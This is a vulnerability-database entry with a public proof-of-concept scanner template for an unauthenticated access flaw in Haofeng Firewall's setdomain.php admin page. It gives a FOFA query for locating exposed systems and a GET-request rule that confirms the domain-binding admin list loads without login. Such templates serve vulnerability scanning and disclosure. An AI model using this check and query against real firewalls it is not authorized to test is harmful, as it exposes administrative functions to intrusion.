haofeng-firewall-setdomain-unauth: Haofeng Firewall (皓峰防火墙) setdomain.php unauthorized access vulnerability

Date: 2025-08-01 | Affected software: Haofeng Firewall (皓峰防火墙) | PoC: public

Vulnerability description

fofa: app="皓峰防火墙系统登录"

PoC code [public]

id: haofeng-firewall-setdomain-unauth

info:
  # Name in English: Haofeng Firewall setdomain.php unauthorized access vulnerability
  name: 皓峰防火墙 setdomain.php 越权访问漏洞
  author: 你是猪
  severity: medium
  description: |-
    fofa: app="皓峰防火墙系统登录"
  tags: haofeng,unauth
  created: 2023/09/02

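rules:
  r0:
    # Plain GET to the domain-binding list page; the rule sends no session or credentials.
    request:
      method: GET
      path: /setdomain.php?action=list
    # Matches when the response is the management platform page (title '皓峰系统管理平台')
    # showing the domain binding list ('域名绑定列表') with its [修改] (modify) and
    # [删除] (delete) links, i.e. the admin page was served without a login.
    expression: response.status == 200 && response.body.bcontains(b'<title>皓峰系统管理平台</title>') && response.body.bcontains(b'域名绑定列表') && response.body.bcontains(b'[修改]') && response.body.bcontains(b'[删除]')
expression: r0()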
